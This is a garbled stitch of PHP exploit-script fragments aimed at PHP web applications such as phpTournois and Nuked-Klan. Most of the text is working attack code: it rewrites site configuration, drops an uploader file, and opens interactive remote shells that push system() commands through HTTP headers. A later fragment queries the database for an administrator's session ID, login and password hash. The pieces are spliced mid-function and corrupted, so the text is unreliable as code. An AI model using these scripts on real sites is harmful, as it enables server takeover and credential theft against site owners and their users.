$xpl->post($url . '?page=configuration&op=modify', $postdata);
print "done\n";
$success = true;
if ($mode == 0) {
print " * loading uploader\t";
$xpl->addheader("upload", "1");
if (preg_match("#upfiledone#i", $xpl->get($url))) {
print "done\n";
} else {
$success = false;
print "error\n";
}
} else {
print "\n\$shell> ";
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
$xpl->reset('header');
$xpl->addheader('Shell', "system('{$cmd}');");
$xpl->get($url);
$data = explode('123456789', $xpl->getcontent());
print $data[1] . "\n\$shell> ";
}
}
/* Reinitialize website name and homepage and erase user avatar */
print " * repairing homepage\t";
$xpl->get('http://myannu.fr/?page=avatars&op=delete&id=1&mode=J');
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=accueil&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
if ($success) {
print "\n * uploader: " . $url . "w00t.php\n";
}
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) {
$styles[1] = "xml_BlueLight";
}
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
$xpl->get($url . 'myadmin.php?choix=1');
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) {
die("\nsploit> Can't retrieve the forum id");
}
$forumid = $fid[1][count($fid[1]) - 1];
$xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}");
print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> ";
if (empty($avatarur)) {
$avatarur = "./avatar/{$name}.jpg";
}
$xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}");
$xpl->reset();
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
$xpl->addheader("Referer", $cmd);
$xpl->get($url . $name . '.php');
$data = explode("337666733", $xpl->getcontent());
print $data[1] . "\n\$shell> ";
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
}
$queries = array();
$queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
$queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$xpl->agent("Mozilla Firefox");
$xpl->addheader("X-Forwarded-For", "127.0.0.1");
$ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
exit("[*] You don't have rights to access Stats page.\n");
}
if (preg_match('#<a href="index.php\\?file=User&op=login_screen">[^<]+</a> | <a href="index.php\\?file=User&op=reg_screen">[^<]+</a>#i', $ctmp)) {
exit("[*] You must be registered, use -user param.\n");
}
$xpl->reset("header");
$xpl->agent("Mozilla Firefox");
attack1();
attack2();
}
function getparam($param, $opt = '')
{
global $argv;
foreach ($argv as $value => $key) {
if ($key == '-' . $param) {
return $argv[$value + 1];
}
}
if ($opt) {
exit("\n-{$param} parameter required");
} else {
